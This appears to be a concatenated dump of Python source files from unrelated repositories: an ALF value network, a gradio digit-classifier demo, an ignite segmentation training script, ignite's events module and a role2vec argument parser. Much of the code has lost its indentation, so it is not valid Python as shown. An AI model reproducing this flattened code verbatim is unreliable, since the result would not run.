output_tensor_spec=TensorSpec(()),
input_preprocessors=None,
preprocessing_combiner=None,
conv_layer_params=None,
fc_layer_params=None,
activation=torch.relu_,
kernel_initializer=None,
use_fc_bn=False,
name="ValueNetwork"):
"""Creates a value network that estimates the expected return.
Args:
input_tensor_spec (TensorSpec): the tensor spec of the input
output_tensor_spec (TensorSpec): spec for the output
input_preprocessors (nested InputPreprocessor): a nest of
`InputPreprocessor`, each of which will be applied to the
corresponding input. If not None, then it must
                have the same structure as `input_tensor_spec` (after reshaping).
If any element is None, then it will be treated as math_ops.identity.
This arg is helpful if you want to have separate preprocessings
for different inputs by configuring a gin file without changing
the code. For example, embedding a discrete input before concatenating
it to another continuous vector.
preprocessing_combiner (NestCombiner): preprocessing called on
complex inputs. Note that this combiner must also accept
`input_tensor_spec` as the input to compute the processed
tensor spec. For example, see `alf.nest.utils.NestConcat`. This
arg is helpful if you want to combine inputs by configuring a
gin file without changing the code.
conv_layer_params (tuple[tuple]): a tuple of tuples where each
tuple takes a format `(filters, kernel_size, strides, padding)`,
where `padding` is optional.
fc_layer_params (tuple[int]): a tuple of integers representing hidden
FC layer sizes.
activation (nn.functional): activation used for hidden layers. The
last layer will not be activated.
kernel_initializer (Callable): initializer for all the layers but
the last layer. If none is provided a default xavier_uniform
initializer will be used.
            use_fc_bn (bool): whether to use Batch Normalization for the internal
                FC layers (i.e. FC layers other than the last one).
name (str):
"""
super().__init__(
input_tensor_spec,
input_preprocessors,
preprocessing_combiner,
name=name)
if kernel_initializer is None:
kernel_initializer = torch.nn.init.xavier_uniform_
last_kernel_initializer = functools.partial(
torch.nn.init.uniform_, a=-0.03, b=0.03)
self._encoding_net = EncodingNetwork(
input_tensor_spec=self._processed_input_tensor_spec,
conv_layer_params=conv_layer_params,
fc_layer_params=fc_layer_params,
activation=activation,
kernel_initializer=kernel_initializer,
use_fc_bn=use_fc_bn,
last_layer_size=output_tensor_spec.numel,
last_activation=math_ops.identity,
last_kernel_initializer=last_kernel_initializer)
self._output_spec = output_tensor_spec
def forward(self, observation, state=()):
"""Computes a value given an observation.
Args:
observation (torch.Tensor): consistent with `input_tensor_spec`
state: empty for API consistent with ValueRNNNetwork
Returns:
value (torch.Tensor): a 1D tensor
state: empty
"""
observation, state = super().forward(observation, state)
value, _ = self._encoding_net(observation)
value = value.reshape(value.shape[0], *self._output_spec.shape)
return value, state
@gin.configurable
class ValueRNNNetwork(PreprocessorNetwork):
"""Outputs temporally correlated values."""
def __init__(self,
input_tensor_spec,
output_tensor_spec=TensorSpec(()),
input_preprocessors=None,
preprocessing_combiner=None,
conv_layer_params=None,
fc_layer_params=None,
lstm_hidden_size=100,
value_fc_layer_params=None,
activation=torch.relu_,
kernel_initializer=None,
name="ValueRNNNetwork"):
"""Creates an instance of `ValueRNNNetwork`.
Args:
input_tensor_spec (TensorSpec): the tensor spec of the input
output_tensor_spec (TensorSpec): spec for the output
input_preprocessors (nested InputPreprocessor): a nest of
`InputPreprocessor`, each of which will be applied to the
corresponding input. If not None, then it must
                have the same structure as `input_tensor_spec` (after reshaping).
If any element is None, then it will be treated as math_ops.identity.
This arg is helpful if you want to have separate preprocessings
for different inputs by configuring a gin file without changing
the code. For example, embedding a discrete input before concatenating
it to another continuous vector.
preprocessing_combiner (NestCombiner): preprocessing called on
complex inputs. Note that this combiner must also accept
`input_tensor_spec` as the input to compute the processed
tensor spec. For example, see `alf.nest.utils.NestConcat`. This
arg is helpful if you want to combine inputs by configuring a
gin file without changing the code.
conv_layer_params (tuple[tuple]): a tuple of tuples where each
tuple takes a format `(filters, kernel_size, strides, padding)`,
where `padding` is optional.
fc_layer_params (tuple[int]): a tuple of integers representing hidden
FC layers for encoding the observation.
lstm_hidden_size (int or tuple[int]): the hidden size(s)
of the LSTM cell(s). Each size corresponds to a cell. If there
are multiple sizes, then lstm cells are stacked.
value_fc_layer_params (tuple[int]): a tuple of integers representing hidden
FC layers that are applied after the lstm cell's output.
activation (nn.functional): activation used for hidden layers. The
last layer will not be activated.
kernel_initializer (Callable): initializer for all the layers but
the last layer. If none is provided a default xavier_uniform
initializer will be used.
name (str):
"""
super().__init__(
input_tensor_spec,
input_preprocessors,
preprocessing_combiner,
name=name)
if kernel_initializer is None:
kernel_initializer = torch.nn.init.xavier_uniform_
last_kernel_initializer = functools.partial(torch.nn.init.uniform_, \
a=-0.03, b=0.03)
self._encoding_net = LSTMEncodingNetwork(
input_tensor_spec=self._processed_input_tensor_spec,
conv_layer_params=conv_layer_params,
pre_fc_layer_params=fc_layer_params,
hidden_size=lstm_hidden_size,
post_fc_layer_params=value_fc_layer_params,
activation=activation,
kernel_initializer=kernel_initializer,
last_layer_size=output_tensor_spec.numel,
last_activation=math_ops.identity,
last_kernel_initializer=last_kernel_initializer)
self._output_spec = output_tensor_spec
def forward(self, observation, state):
"""Computes a value given an observation.
Args:
observation (torch.Tensor): consistent with `input_tensor_spec`
state (nest[tuple]): a nest structure of state tuples (h, c)
Returns:
value (torch.Tensor): a 1D tensor
new_state (nest[tuple]): the updated states
"""
observation, state = super().forward(observation, state)
value, state = self._encoding_net(observation, state)
value = value.reshape(value.shape[0], *self._output_spec.shape)
return value, state
@property
def state_spec(self):
return self._encoding_net.state_spec
``` |
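A minimal usage sketch for `ValueNetwork`, using only the constructor and `forward` defined above; the 4-dimensional observation spec and batch size 5 are assumptions.

```python
# Hypothetical usage sketch for ValueNetwork; sizes are assumptions.
from alf.networks.value_networks import ValueNetwork
from alf.tensor_specs import TensorSpec

obs_spec = TensorSpec((4, ))
value_net = ValueNetwork(
    input_tensor_spec=obs_spec,
    fc_layer_params=(32, 32))                     # two hidden FC layers

observations = obs_spec.zeros(outer_dims=(5, ))   # dummy batch of 5 observations
values, _ = value_net(observations)               # values has shape (5,)
```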
{
"source": "1nF0rmed/gradio",
"score": 3
} |
#### File: gradio/demo/digit_classifier.py
```python
import tensorflow as tf
import gradio
import gradio as gr
from urllib.request import urlretrieve
import os
urlretrieve("https://gr-models.s3-us-west-2.amazonaws.com/mnist-model.h5", "mnist-model.h5")
model = tf.keras.models.load_model("mnist-model.h5")
def recognize_digit(image):
image = image.reshape(1, -1)
prediction = model.predict(image).tolist()[0]
return {str(i): prediction[i] for i in range(10)}
im = gradio.inputs.Image(shape=(28, 28), image_mode='L', invert_colors=False, source="canvas")
iface = gr.Interface(
recognize_digit,
im,
gradio.outputs.Label(num_top_classes=3),
live=True,
interpretation="default",
capture_session=True,
)
iface.test_launch()
if __name__ == "__main__":
iface.launch()
``` |
{
"source": "1nF0rmed/ignite",
"score": 2
} |
#### File: code/scripts/training.py
```python
import sys
from collections.abc import Mapping
from pathlib import Path
import torch
from apex import amp
from dataflow.datasets import VOCSegmentationOpencv
from py_config_runner.config_utils import TRAINVAL_CONFIG, assert_config, get_params
from py_config_runner.utils import set_seed
from utils import exp_tracking
from utils.handlers import predictions_gt_images_handler
import ignite
import ignite.distributed as idist
from ignite.contrib.engines import common
from ignite.engine import Engine, Events, create_supervised_evaluator
from ignite.handlers import DiskSaver
from ignite.metrics import ConfusionMatrix, IoU, mIoU
from ignite.utils import setup_logger
# Adds "code" folder to python path
sys.path.insert(0, Path(__file__).parent.parent.as_posix())
def initialize(config):
model = config.model.to(config.device)
optimizer = config.optimizer
# Setup Nvidia/Apex AMP
model, optimizer = amp.initialize(model, optimizer, opt_level=getattr(config, "fp16_opt_level", "O2"), num_losses=1)
# Adapt model to dist conf
model = idist.auto_model(model)
criterion = config.criterion.to(config.device)
return model, optimizer, criterion
def get_save_handler(config):
if exp_tracking.has_clearml:
from ignite.contrib.handlers.clearml_logger import ClearMLSaver
return ClearMLSaver(dirname=config.output_path.as_posix())
return DiskSaver(config.output_path.as_posix())
def create_trainer(model, optimizer, criterion, train_sampler, config, logger):
prepare_batch = config.prepare_batch
device = config.device
# Setup trainer
accumulation_steps = getattr(config, "accumulation_steps", 1)
model_output_transform = getattr(config, "model_output_transform", lambda x: x)
def train_update_function(engine, batch):
model.train()
x, y = prepare_batch(batch, device=device, non_blocking=True)
y_pred = model(x)
y_pred = model_output_transform(y_pred)
loss = criterion(y_pred, y)
if isinstance(loss, Mapping):
assert "supervised batch loss" in loss
loss_dict = loss
output = {k: v.item() for k, v in loss_dict.items()}
loss = loss_dict["supervised batch loss"] / accumulation_steps
else:
output = {"supervised batch loss": loss.item()}
with amp.scale_loss(loss, optimizer, loss_id=0) as scaled_loss:
scaled_loss.backward()
if engine.state.iteration % accumulation_steps == 0:
optimizer.step()
optimizer.zero_grad()
return output
output_names = getattr(config, "output_names", ["supervised batch loss",])
lr_scheduler = config.lr_scheduler
trainer = Engine(train_update_function)
trainer.logger = logger
to_save = {"model": model, "optimizer": optimizer, "lr_scheduler": lr_scheduler, "trainer": trainer, "amp": amp}
save_every_iters = getattr(config, "save_every_iters", 1000)
common.setup_common_training_handlers(
trainer,
train_sampler,
to_save=to_save,
save_every_iters=save_every_iters,
save_handler=get_save_handler(config),
lr_scheduler=lr_scheduler,
with_gpu_stats=exp_tracking.has_mlflow,
output_names=output_names,
with_pbars=False,
)
if idist.get_rank() == 0:
common.ProgressBar(persist=False).attach(trainer, metric_names="all")
return trainer
def create_evaluators(model, metrics, config):
model_output_transform = getattr(config, "model_output_transform", lambda x: x)
evaluator_args = dict(
model=model,
metrics=metrics,
device=config.device,
non_blocking=True,
prepare_batch=config.prepare_batch,
output_transform=lambda x, y, y_pred: (model_output_transform(y_pred), y,),
)
train_evaluator = create_supervised_evaluator(**evaluator_args)
evaluator = create_supervised_evaluator(**evaluator_args)
if idist.get_rank() == 0:
common.ProgressBar(desc="Evaluation (train)", persist=False).attach(train_evaluator)
common.ProgressBar(desc="Evaluation (val)", persist=False).attach(evaluator)
return evaluator, train_evaluator
def log_metrics(logger, epoch, elapsed, tag, metrics):
metrics_output = "\n".join([f"\t{k}: {v}" for k, v in metrics.items()])
logger.info(f"\nEpoch {epoch} - Evaluation time (seconds): {int(elapsed)} - {tag} metrics:\n {metrics_output}")
def log_basic_info(logger, config):
msg = f"\n- PyTorch version: {torch.__version__}"
msg += f"\n- Ignite version: {ignite.__version__}"
msg += f"\n- Cuda device name: {torch.cuda.get_device_name(idist.get_local_rank())}"
logger.info(msg)
if idist.get_world_size() > 1:
msg = "\nDistributed setting:"
msg += f"\tbackend: {idist.backend()}"
msg += f"\trank: {idist.get_rank()}"
msg += f"\tworld size: {idist.get_world_size()}"
logger.info(msg)
def training(local_rank, config, logger=None):
if not getattr(config, "use_fp16", True):
raise RuntimeError("This training script uses by default fp16 AMP")
torch.backends.cudnn.benchmark = True
set_seed(config.seed + local_rank)
train_loader, val_loader, train_eval_loader = config.train_loader, config.val_loader, config.train_eval_loader
# Setup model, optimizer, criterion
model, optimizer, criterion = initialize(config)
# Setup trainer for this specific task
trainer = create_trainer(model, optimizer, criterion, train_loader.sampler, config, logger)
# Setup evaluators
num_classes = config.num_classes
cm_metric = ConfusionMatrix(num_classes=num_classes)
val_metrics = {
"IoU": IoU(cm_metric),
"mIoU_bg": mIoU(cm_metric),
}
if hasattr(config, "val_metrics") and isinstance(config.val_metrics, dict):
val_metrics.update(config.val_metrics)
evaluator, train_evaluator = create_evaluators(model, val_metrics, config)
val_interval = getattr(config, "val_interval", 1)
@trainer.on(Events.EPOCH_COMPLETED(every=val_interval))
def run_validation():
epoch = trainer.state.epoch
state = train_evaluator.run(train_eval_loader)
log_metrics(logger, epoch, state.times["COMPLETED"], "Train", state.metrics)
state = evaluator.run(val_loader)
log_metrics(logger, epoch, state.times["COMPLETED"], "Test", state.metrics)
if config.num_epochs % val_interval != 0:
trainer.add_event_handler(Events.COMPLETED, run_validation)
if getattr(config, "start_by_validation", False):
trainer.add_event_handler(Events.STARTED, run_validation)
score_metric_name = "mIoU_bg"
if hasattr(config, "es_patience"):
common.add_early_stopping_by_val_score(config.es_patience, evaluator, trainer, metric_name=score_metric_name)
# Store 3 best models by validation accuracy:
common.gen_save_best_models_by_val_score(
save_handler=get_save_handler(config),
evaluator=evaluator,
models=model,
metric_name=score_metric_name,
n_saved=3,
trainer=trainer,
tag="val",
)
if idist.get_rank() == 0:
tb_logger = common.setup_tb_logging(
config.output_path.as_posix(),
trainer,
optimizer,
evaluators={"training": train_evaluator, "validation": evaluator},
)
if not exp_tracking.has_clearml:
exp_tracking_logger = exp_tracking.setup_logging(
trainer, optimizer, evaluators={"training": train_evaluator, "validation": evaluator}
)
# Log validation predictions as images
# We define a custom event filter to log less frequently the images (to reduce storage size)
# - we plot images with masks of the middle validation batch
# - once every 3 validations and
# - at the end of the training
def custom_event_filter(_, val_iteration):
c1 = val_iteration == len(val_loader) // 2
c2 = trainer.state.epoch % (getattr(config, "val_interval", 1) * 3) == 0
c2 |= trainer.state.epoch == config.num_epochs
return c1 and c2
tb_logger.attach(
evaluator,
log_handler=predictions_gt_images_handler(
img_denormalize_fn=config.img_denormalize, n_images=15, another_engine=trainer, prefix_tag="validation"
),
event_name=Events.ITERATION_COMPLETED(event_filter=custom_event_filter),
)
# Log confusion matrix to ClearML:
if exp_tracking.has_clearml:
@trainer.on(Events.COMPLETED)
def compute_and_log_cm():
cm = cm_metric.compute()
# CM: values are normalized such that diagonal values represent class recalls
cm = ConfusionMatrix.normalize(cm, "recall").cpu().numpy()
if idist.get_rank() == 0:
try:
from clearml import Task
except ImportError:
# Backwards-compatibility for legacy Trains SDK
from trains import Task
clearml_logger = Task.current_task().get_logger()
clearml_logger.report_confusion_matrix(
title="Final Confusion Matrix",
series="cm-preds-gt",
matrix=cm,
iteration=trainer.state.iteration,
xlabels=VOCSegmentationOpencv.target_names,
ylabels=VOCSegmentationOpencv.target_names,
)
trainer.run(train_loader, max_epochs=config.num_epochs)
if idist.get_rank() == 0:
tb_logger.close()
if not exp_tracking.has_clearml:
exp_tracking_logger.close()
def run(config, **kwargs):
    """This is the main method to run the training. As this training script is launched with
    `py_config_runner`, it must contain a `run(config, **kwargs)` method.
    """
assert torch.cuda.is_available(), torch.cuda.is_available()
assert torch.backends.cudnn.enabled, "Nvidia/Amp requires cudnn backend to be enabled."
with idist.Parallel(backend="nccl") as parallel:
logger = setup_logger(name="Pascal-VOC12 Training", distributed_rank=idist.get_rank())
assert_config(config, TRAINVAL_CONFIG)
# The following attributes are automatically added by py_config_runner
assert hasattr(config, "config_filepath") and isinstance(config.config_filepath, Path)
assert hasattr(config, "script_filepath") and isinstance(config.script_filepath, Path)
if idist.get_rank() == 0 and exp_tracking.has_clearml:
try:
from clearml import Task
except ImportError:
# Backwards-compatibility for legacy Trains SDK
from trains import Task
task = Task.init("Pascal-VOC12 Training", config.config_filepath.stem)
task.connect_configuration(config.config_filepath.as_posix())
log_basic_info(logger, config)
config.output_path = Path(exp_tracking.get_output_path())
# dump python files to reproduce the run
exp_tracking.log_artifact(config.config_filepath.as_posix())
exp_tracking.log_artifact(config.script_filepath.as_posix())
exp_tracking.log_params(get_params(config, TRAINVAL_CONFIG))
try:
parallel.run(training, config, logger=logger)
except KeyboardInterrupt:
            logger.info("Caught KeyboardInterrupt -> exit")
except Exception as e: # noqa
logger.exception("")
raise e
```
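The `config` object consumed above is just a Python module loaded by `py_config_runner`. The attribute names in the sketch below are exactly the ones this script reads; every concrete value (model, optimizer, loaders, transforms) is a placeholder assumption, and a real config must additionally satisfy `assert_config(config, TRAINVAL_CONFIG)`.

```python
# Hypothetical py_config_runner configuration sketch (placeholders only).
import torch

seed = 12
device = "cuda"
num_classes = 21          # Pascal-VOC12: 20 object classes + background
num_epochs = 100
val_interval = 2

# Consumed by initialize(config).
model = torch.nn.Conv2d(3, num_classes, kernel_size=1)   # placeholder segmentation head
optimizer = torch.optim.SGD(model.parameters(), lr=0.01, momentum=0.9)
criterion = torch.nn.CrossEntropyLoss()
lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=30)

# Consumed by training(); these must be real DataLoaders in an actual run.
# train_loader = ...
# train_eval_loader = ...
# val_loader = ...

def prepare_batch(batch, device=None, non_blocking=True):
    x, y = batch
    return (x.to(device, non_blocking=non_blocking),
            y.to(device, non_blocking=non_blocking))

def img_denormalize(img):
    # Only used when logging prediction images to TensorBoard.
    return img
```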
#### File: ignite/engine/events.py
```python
import numbers
import warnings
import weakref
from enum import Enum
from types import DynamicClassAttribute
from typing import TYPE_CHECKING, Any, Callable, Dict, Iterable, Iterator, List, Optional, Union
from torch.utils.data import DataLoader
from ignite.engine.utils import _check_signature
if TYPE_CHECKING:
from ignite.engine.engine import Engine
__all__ = ["CallableEventWithFilter", "EventEnum", "Events", "State", "EventsList", "RemovableEventHandle"]
class CallableEventWithFilter:
"""Single Event containing a filter, specifying whether the event should
be run at the current event (if the event type is correct)
Args:
value (str): The actual enum value. Only needed for internal use. Do not touch!
        event_filter (callable): A function taking the engine and the current event value as input and returning a
            boolean to indicate whether this event should be executed. Defaults to None, which will result in a
            function that always returns `True`
name (str, optional): The enum-name of the current object. Only needed for internal use. Do not touch!
"""
def __init__(self, value: str, event_filter: Optional[Callable] = None, name: Optional[str] = None) -> None:
if event_filter is None:
event_filter = CallableEventWithFilter.default_event_filter
self.filter = event_filter
if not hasattr(self, "_value_"):
self._value_ = value
if not hasattr(self, "_name_") and name is not None:
self._name_ = name
# copied to be compatible to enum
@DynamicClassAttribute
def name(self) -> str:
"""The name of the Enum member."""
return self._name_
@DynamicClassAttribute
def value(self) -> str:
"""The value of the Enum member."""
return self._value_
def __call__(
self, event_filter: Optional[Callable] = None, every: Optional[int] = None, once: Optional[int] = None
) -> "CallableEventWithFilter":
"""
Makes the event class callable and accepts either an arbitrary callable as filter
(which must take in the engine and current event value and return a boolean) or an every or once value
Args:
event_filter (callable, optional): a filter function to check if the event should be executed when
the event type was fired
every (int, optional): a value specifying how often the event should be fired
once (int, optional): a value specifying when the event should be fired (if only once)
Returns:
CallableEventWithFilter: A new event having the same value but a different filter function
"""
if not ((event_filter is not None) ^ (every is not None) ^ (once is not None)):
raise ValueError("Only one of the input arguments should be specified")
if (event_filter is not None) and not callable(event_filter):
raise TypeError("Argument event_filter should be a callable")
        if (every is not None) and not (isinstance(every, numbers.Integral) and every > 0):
            raise ValueError("Argument every should be an integer and greater than zero")
        if (once is not None) and not (isinstance(once, numbers.Integral) and once > 0):
            raise ValueError("Argument once should be an integer and greater than zero")
if every is not None:
if every == 1:
# Just return the event itself
event_filter = None
else:
event_filter = self.every_event_filter(every)
if once is not None:
event_filter = self.once_event_filter(once)
# check signature:
if event_filter is not None:
_check_signature(event_filter, "event_filter", "engine", "event")
return CallableEventWithFilter(self.value, event_filter, self.name)
@staticmethod
def every_event_filter(every: int) -> Callable:
def wrapper(engine: "Engine", event: int) -> bool:
if event % every == 0:
return True
return False
return wrapper
@staticmethod
def once_event_filter(once: int) -> Callable:
def wrapper(engine: "Engine", event: int) -> bool:
if event == once:
return True
return False
return wrapper
@staticmethod
def default_event_filter(engine: "Engine", event: int) -> bool:
return True
def __str__(self) -> str:
return "<event=%s, filter=%r>" % (self.name, self.filter)
def __eq__(self, other: Any) -> bool:
if isinstance(other, CallableEventWithFilter):
return self.name == other.name
elif isinstance(other, str):
return self.name == other
else:
return NotImplemented
def __hash__(self) -> int:
return hash(self._name_)
def __or__(self, other: Any) -> "EventsList":
return EventsList() | self | other
class EventEnum(CallableEventWithFilter, Enum): # type: ignore[misc]
"""Base class for all :class:`~ignite.engine.events.Events`. User defined custom events should also inherit
this class. For example, Custom events based on the loss calculation and backward pass can be created as follows:
.. code-block:: python
from ignite.engine import EventEnum
class BackpropEvents(EventEnum):
BACKWARD_STARTED = 'backward_started'
BACKWARD_COMPLETED = 'backward_completed'
OPTIM_STEP_COMPLETED = 'optim_step_completed'
def update(engine, batch):
# ...
loss = criterion(y_pred, y)
engine.fire_event(BackpropEvents.BACKWARD_STARTED)
loss.backward()
engine.fire_event(BackpropEvents.BACKWARD_COMPLETED)
optimizer.step()
engine.fire_event(BackpropEvents.OPTIM_STEP_COMPLETED)
# ...
trainer = Engine(update)
trainer.register_events(*BackpropEvents)
@trainer.on(BackpropEvents.BACKWARD_STARTED)
def function_before_backprop(engine):
# ...
"""
pass
class Events(EventEnum):
"""Events that are fired by the :class:`~ignite.engine.engine.Engine` during execution. Built-in events:
- STARTED : triggered when engine's run is started
- EPOCH_STARTED : triggered when the epoch is started
- GET_BATCH_STARTED : triggered before next batch is fetched
- GET_BATCH_COMPLETED : triggered after the batch is fetched
- ITERATION_STARTED : triggered when an iteration is started
- ITERATION_COMPLETED : triggered when the iteration is ended
- DATALOADER_STOP_ITERATION : engine's specific event triggered when dataloader has no more data to provide
- EXCEPTION_RAISED : triggered when an exception is encountered
- TERMINATE_SINGLE_EPOCH : triggered when the run is about to end the current epoch,
after receiving a :meth:`~ignite.engine.engine.Engine.terminate_epoch()` or
:meth:`~ignite.engine.engine.Engine.terminate()` call.
- TERMINATE : triggered when the run is about to end completely,
after receiving :meth:`~ignite.engine.engine.Engine.terminate()` call.
- EPOCH_COMPLETED : triggered when the epoch is ended. Note that this is triggered even
when :meth:`~ignite.engine.engine.Engine.terminate_epoch()` is called.
- COMPLETED : triggered when engine's run is completed
The table below illustrates which events are triggered when various termination methods are called.
.. list-table::
:widths: 24 25 33 18
:header-rows: 1
* - Method
- EVENT_COMPLETED
- TERMINATE_SINGLE_EPOCH
- TERMINATE
* - no termination
- ✔
- ✗
- ✗
* - :meth:`~ignite.engine.engine.Engine.terminate_epoch()`
- ✔
- ✔
- ✗
* - :meth:`~ignite.engine.engine.Engine.terminate()`
- ✗
- ✔
- ✔
    Since v0.3.0, Events became more flexible and allow passing an event filter to the Engine:
.. code-block:: python
engine = Engine()
# a) custom event filter
def custom_event_filter(engine, event):
if event in [1, 2, 5, 10, 50, 100]:
return True
return False
@engine.on(Events.ITERATION_STARTED(event_filter=custom_event_filter))
def call_on_special_event(engine):
# do something on 1, 2, 5, 10, 50, 100 iterations
# b) "every" event filter
@engine.on(Events.ITERATION_STARTED(every=10))
def call_every(engine):
# do something every 10th iteration
# c) "once" event filter
@engine.on(Events.ITERATION_STARTED(once=50))
def call_once(engine):
# do something on 50th iteration
Event filter function `event_filter` accepts as input `engine` and `event` and should return True/False.
Argument `event` is the value of iteration or epoch, depending on which type of Events the function is passed.
Since v0.4.0, user can also combine events with `|`-operator:
.. code-block:: python
events = Events.STARTED | Events.COMPLETED | Events.ITERATION_STARTED(every=3)
engine = ...
@engine.on(events)
def call_on_events(engine):
# do something
Since v0.4.0, custom events defined by user should inherit from :class:`~ignite.engine.events.EventEnum` :
.. code-block:: python
class CustomEvents(EventEnum):
FOO_EVENT = "foo_event"
BAR_EVENT = "bar_event"
"""
EPOCH_STARTED = "epoch_started"
EPOCH_COMPLETED = "epoch_completed"
STARTED = "started"
COMPLETED = "completed"
ITERATION_STARTED = "iteration_started"
ITERATION_COMPLETED = "iteration_completed"
EXCEPTION_RAISED = "exception_raised"
GET_BATCH_STARTED = "get_batch_started"
GET_BATCH_COMPLETED = "get_batch_completed"
DATALOADER_STOP_ITERATION = "dataloader_stop_iteration"
TERMINATE = "terminate"
TERMINATE_SINGLE_EPOCH = "terminate_single_epoch"
def __or__(self, other: Any) -> "EventsList":
return EventsList() | self | other
class EventsList:
"""Collection of events stacked by operator `__or__`.
.. code-block:: python
events = Events.STARTED | Events.COMPLETED
events |= Events.ITERATION_STARTED(every=3)
engine = ...
@engine.on(events)
def call_on_events(engine):
# do something
or
.. code-block:: python
@engine.on(Events.STARTED | Events.COMPLETED | Events.ITERATION_STARTED(every=3))
def call_on_events(engine):
# do something
"""
def __init__(self) -> None:
self._events = [] # type: List[Union[Events, CallableEventWithFilter]]
def _append(self, event: Union[Events, CallableEventWithFilter]) -> None:
if not isinstance(event, (Events, CallableEventWithFilter)):
raise TypeError(f"Argument event should be Events or CallableEventWithFilter, got: {type(event)}")
self._events.append(event)
def __getitem__(self, item: int) -> Union[Events, CallableEventWithFilter]:
return self._events[item]
def __iter__(self) -> Iterator[Union[Events, CallableEventWithFilter]]:
return iter(self._events)
def __len__(self) -> int:
return len(self._events)
def __or__(self, other: Union[Events, CallableEventWithFilter]) -> "EventsList":
self._append(event=other)
return self
class State:
"""An object that is used to pass internal and user-defined state between event handlers. By default, state
contains the following attributes:
.. code-block:: python
state.iteration # 1-based, the first iteration is 1
state.epoch # 1-based, the first epoch is 1
state.seed # seed to set at each epoch
state.dataloader # data passed to engine
state.epoch_length # optional length of an epoch
state.max_epochs # number of epochs to run
state.max_iters # number of iterations to run
state.batch # batch passed to `process_function`
state.output # output of `process_function` after a single iteration
state.metrics # dictionary with defined metrics if any
state.times # dictionary with total and per-epoch times fetched on
# keys: Events.EPOCH_COMPLETED.name and Events.COMPLETED.name
"""
event_to_attr = {
Events.GET_BATCH_STARTED: "iteration",
Events.GET_BATCH_COMPLETED: "iteration",
Events.ITERATION_STARTED: "iteration",
Events.ITERATION_COMPLETED: "iteration",
Events.EPOCH_STARTED: "epoch",
Events.EPOCH_COMPLETED: "epoch",
Events.STARTED: "epoch",
Events.COMPLETED: "epoch",
} # type: Dict[Union[str, "Events", "CallableEventWithFilter"], str]
def __init__(self, **kwargs: Any) -> None:
self.iteration = 0
self.epoch = 0
self.epoch_length = None # type: Optional[int]
self.max_epochs = None # type: Optional[int]
self.max_iters = None # type: Optional[int]
self.output = None # type: Optional[int]
self.batch = None # type: Optional[int]
self.metrics = {} # type: Dict[str, Any]
self.dataloader = None # type: Optional[Union[DataLoader, Iterable[Any]]]
self.seed = None # type: Optional[int]
self.times = {
Events.EPOCH_COMPLETED.name: None,
Events.COMPLETED.name: None,
} # type: Dict[str, Optional[float]]
for k, v in kwargs.items():
setattr(self, k, v)
self._update_attrs()
def _update_attrs(self) -> None:
for value in self.event_to_attr.values():
if not hasattr(self, value):
setattr(self, value, 0)
def get_event_attrib_value(self, event_name: Union[str, Events, CallableEventWithFilter]) -> int:
if event_name not in State.event_to_attr:
raise RuntimeError(f"Unknown event name '{event_name}'")
return getattr(self, State.event_to_attr[event_name])
def __repr__(self) -> str:
s = "State:\n"
for attr, value in self.__dict__.items():
if not isinstance(value, (numbers.Number, str)):
value = type(value)
s += f"\t{attr}: {value}\n"
return s
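# Illustrative note (not part of the library code above): handlers typically read the
# attributes documented in the State docstring off `engine.state`, e.g.
#   print(engine.state.epoch, engine.state.iteration, engine.state.metrics.get("acc"))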
class RemovableEventHandle:
"""A weakref handle to remove a registered event.
A handle that may be used to remove a registered event handler via the
remove method, with-statement, or context manager protocol. Returned from
:meth:`~ignite.engine.engine.Engine.add_event_handler`.
Args:
event_name: Registered event name.
handler: Registered event handler, stored as weakref.
engine: Target engine, stored as weakref.
Example usage:
.. code-block:: python
engine = Engine()
def print_epoch(engine):
print(f"Epoch: {engine.state.epoch}")
with engine.add_event_handler(Events.EPOCH_COMPLETED, print_epoch):
# print_epoch handler registered for a single run
engine.run(data)
# print_epoch handler is now unregistered
"""
def __init__(
self, event_name: Union[CallableEventWithFilter, Enum, EventsList, Events], handler: Callable, engine: "Engine"
) -> None:
self.event_name = event_name
self.handler = weakref.ref(handler)
self.engine = weakref.ref(engine)
def remove(self) -> None:
"""Remove handler from engine."""
handler = self.handler()
engine = self.engine()
if handler is None or engine is None:
return
if isinstance(self.event_name, EventsList):
for e in self.event_name:
if engine.has_event_handler(handler, e):
engine.remove_event_handler(handler, e)
else:
if engine.has_event_handler(handler, self.event_name):
engine.remove_event_handler(handler, self.event_name)
def __enter__(self) -> "RemovableEventHandle":
return self
def __exit__(self, *args: Any, **kwargs: Any) -> None:
self.remove()
``` |
{
"source": "1nF0rmed/speech_recog",
"score": 3
} |
#### File: 1nF0rmed/speech_recog/augmentation_transforms.py
```python
import config
import custom_transforms as t
from dataset import load_noise_waves
augmentations = {
'mel': t.MelSpectrogram(n_mels=128, hop_length=126),
'mfcc': t.Mfcc(n_mels=128, hop_length=126),
}
def make_augmentation_transforms(augmentation, mode):
if mode == 'train':
transforms = [
t.RandomPadToLength(length=config.AUDIO_LENGTH),
t.Noise(
length=config.AUDIO_LENGTH,
noise_waves=load_noise_waves(),
noise_limit=0.2,
).with_prob(0.5),
t.RandomShift(shift_limit=0.2).with_prob(0.5),
]
else:
transforms = [t.PadToLength(length=config.AUDIO_LENGTH)]
transforms.append(augmentations[augmentation])
transforms += [
t.Pad(((0, 0), (0, 1)), 'constant'),
t.ExpandDims(),
t.ToTensor(),
]
return t.Compose(transforms)
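# Illustrative usage sketch (hedged): `config.AUDIO_LENGTH` and `load_noise_waves()` are
# provided elsewhere in this repo; a raw waveform array would be transformed with e.g.
#   train_tf = make_augmentation_transforms('mel', mode='train')
#   x = train_tf(waveform)  # padded, optionally noised/shifted, then mel spectrogram -> tensor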
``` |
{
"source": "1nf1del/role2vec",
"score": 3
} |
#### File: role2vec/src/parser.py
```python
import argparse
def parameter_parser():
"""
A method to parse up command line parameters.
The default hyperparameters give a good quality representation without grid search.
Representations are sorted by ID.
"""
parser = argparse.ArgumentParser(description = "Run Role2Vec.")
parser.add_argument('--graph-input',
nargs = '?',
default = "./input/cora_edges.csv",
help = 'Input graph path -- edge list csv.')
parser.add_argument('--output',
nargs = '?',
default = './output/cora_role2vec.csv',
help = 'Embeddings path.')
parser.add_argument('--window-size',
type = int,
default = 5,
help = 'Window size for skip-gram. Default is 5.')
parser.add_argument('--walk-number',
type = int,
default = 10,
help = 'Number of random walks. Default is 10.')
parser.add_argument('--walk-length',
type = int,
default = 80,
help = 'Walk length. Default is 80.')
parser.add_argument('--sampling',
nargs = '?',
default = 'first',
help = 'Random walk order.')
parser.add_argument('--P',
type = float,
default = 1.00,
help = 'Return parameter. Default is 1.0.')
parser.add_argument('--Q',
type = float,
default = 1.00,
help = 'Inout parameter. Default is 1.0.')
parser.add_argument('--dimensions',
type = int,
